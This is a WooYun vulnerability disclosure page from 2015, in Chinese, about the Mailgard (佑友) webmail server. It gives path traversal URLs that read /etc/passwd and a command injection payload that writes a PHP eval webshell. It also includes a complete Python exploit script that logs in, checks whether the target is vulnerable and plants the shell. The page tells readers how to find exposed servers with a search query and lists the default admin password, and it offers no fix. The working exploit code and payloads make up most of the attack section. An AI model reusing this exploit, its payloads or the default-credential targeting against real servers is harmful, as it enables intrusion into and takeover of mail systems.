当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(16) 关注此漏洞

缺陷编号: WooYun-2015-97649

漏洞标题: 佑友(mailgard webmail)邮件服务器getshell 0day,附python exp

相关厂商: 佑友

漏洞作者: f4ckbaidu

提交时间: 2015-02-19 18:14

公开时间: 2015-05-29 17:18

漏洞类型:

危害等级: 高

自评Rank: 20

漏洞状态: 已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 任意文件读取 目录遍历

8人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-19: 细节已通知厂商并且等待厂商处理中
2015-02-28: 厂商已经确认,细节仅向厂商公开
2015-03-03: 细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-04-24: 细节向核心白帽子及相关领域专家公开
2015-05-04: 细节向普通白帽子公开
2015-05-14: 细节向实习白帽子公开
2015-05-29: 细节向公众公开

简要描述:

过年前来一发,能得个闪电吗?

详细说明:

一、任意文件下载(需要登录)

百度搜索intitle:"mailgard webmail",多家没有改admin密码的中招,默认密码admin/hicomadmin

http://**.**.**.**/src/read_file.php?signature=../../../../../../../etc/passwd

http://**.**.**.**/src/read_file.php?uploadimage=../../../../../../../../../../etc/passwd

根据此漏洞读取lighttpd error.log得到web更目录:/var/www/newmail/

1.png





二、系统命令执行导致getshell

下载文件进行代码审计,找到一个命令执行漏洞

/var/www/newmail/src/ajaxserver.php第1789行开始:

code 区域
if($_GET['exec'] == 'recall'){ // 撤回邮件


	$user		= str_replace('\\','\\\\',$_POST['user']);


	$messageid	= str_replace('\\','\\\\',$_POST['messageid']);


	system(HM_SHELL."Mail_recall.sh '".$user."' '".$messageid."' '".$onlineip."' >null &");


	unset($_SESSION['H_MAILS']['Sent']);echo 'ok';exit;


}



程序员sb,直接毁了magic_quotes_gpc和addslashes的防护(系统自身带了全局过滤,代码抄袭discuz的),导致getshell:

EXP如下,得到webshell,http://**.**.**.**/shell.php,密码123

code 区域
http://**.**.**.**/src/ajaxserver.php?exec=recall


POST: user=1'|echo '<?php eval($_POST[123]); ?>'>/var/www/newmail/shell.php #&messageid=1



2.png



自动化exp如下:

用法python fuck.py http://**.**.**.**:80/ 帐号 密码

code 区域
import requests


import sys








if len(sys.argv) < 4:


	print 'usage:python fuck.py http(s)://target:port/ <username> <password>'


	print 'example:python fuck.py http://**.**.**.**:80/ admin admin'


	sys.exit(0)


else:


	target = sys.argv[1]


	if not target.endswith('/'):


		target += '/'


	username = sys.argv[2]


	password = sys.argv[3]


	sessionid = ''








def login(target,username,password):


	login_request = ''


	global sessionid


	domain = target[(target.index('.')+1):(target.index(':',6))]


	print 'domain=' + domain


	login_url = target + 'index.php'


	post_data = 'txtname=' + username + '&domain=' + domain + '&txtpwd=' + password + '&languages=zh-cn&button=%E7%99%BB+%E5%BD%95'


	try:


		login_request = requests.post(login_url,post_data,allow_redirects=False,verify=False,timeout=3)


		if login_request.status_code == 302:


			print 'login succeeded'


			sessionid = login_request.cookies['PHPSESSID']


			return sessionid


		else:


			print 'login failed,please check username and password'


			return False


	except Exception,e:   


		print Exception,":",e


		return False








def check(target,sessionid):


	check_request = ''


	url = target + 'src/read_file.php?uploadimage=../../../../../../../../../../etc/passwd'


	request_header = {'cookie': 'MAILSESSID=' + str(sessionid) + '; PHPSESSID=' + str(sessionid)}


	try:


		check_request = requests.get(url,headers=request_header,verify=False,timeout=3)


		if 'root:x:0:0:root:/root:/bin/bash' in check_request.text and check_request.status_code == 200:


			print 'target is vulnerable\r\n'


			# print 'the content of file \'/etc/passwd\'\r\n'


			# print check_request.text


			return True


		else:


			print 'target is not vulnerable'


			return False


	except Exception,e:   


		print Exception,":",e


		return False








def getshell(target,sessionid):


	getshell_request = ''


	fuckurl = target + 'src/ajaxserver.php?exec=recall'


	getshell_header = {'cookie': 'MAILSESSID=' + str(sessionid) + '; PHPSESSID=' + str(sessionid)}


	getshell_data = 'user=1\'|echo \'<?php eval($_POST[123]); ?>\'>/var/www/newmail/shell123.php #&messageid=1'


	# print getshell_data


	try:


		getshell_request = requests.post(fuckurl,getshell_data,headers=getshell_header,allow_redirects=False,verify=False)


		if (requests.get(target + 'shell123.php',verify=False).status_code == 200):


			print 'getshell succeeded,address:' + str(target + 'shell123.php') + ' password:123'


		else:


			print 'getshell failed!'


	except Exception,e:   


		print Exception,":",e


		return False








if __name__ == '__main__':


	if (login(target,username,password)):


		print 'sessionid=' + sessionid


		if(check(target,sessionid)):


			print 'target is vulnerable to directory transversal'


		else:


			print 'target is not vulnerable to directory transversal'


		print 'trying to getshell,please wait'


		getshell(target,sessionid)



exp_usage.png

漏洞证明:

百度搜索intitle:"mailgard webmail",多家没有改admin密码的中招,默认密码admin/hicomadmin



example1.png



example2.png



example3.png

修复方案:

i don't know

版权声明:转载请注明来源 f4ckbaidu@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-02-28 17:16

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。

最新状态:

暂无

漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2015-02-19 15:19 | f4ckbaidu ( 普通白帽子 | Rank:243 漏洞数:31 | 开发真是日了狗了)
    0

    exp写的有点问题,URL一定要带端口号才行

    1# 回复此人
  2. 2015-05-29 17:24 | sql小神 ( 实习白帽子 | Rank:56 漏洞数:13 | 有些漏洞可以提,有些漏洞不可以提。)
    0

    @f4ckbaidu 目测你要火啊

    2# 回复此人

登录后才能发表评论,请先 登录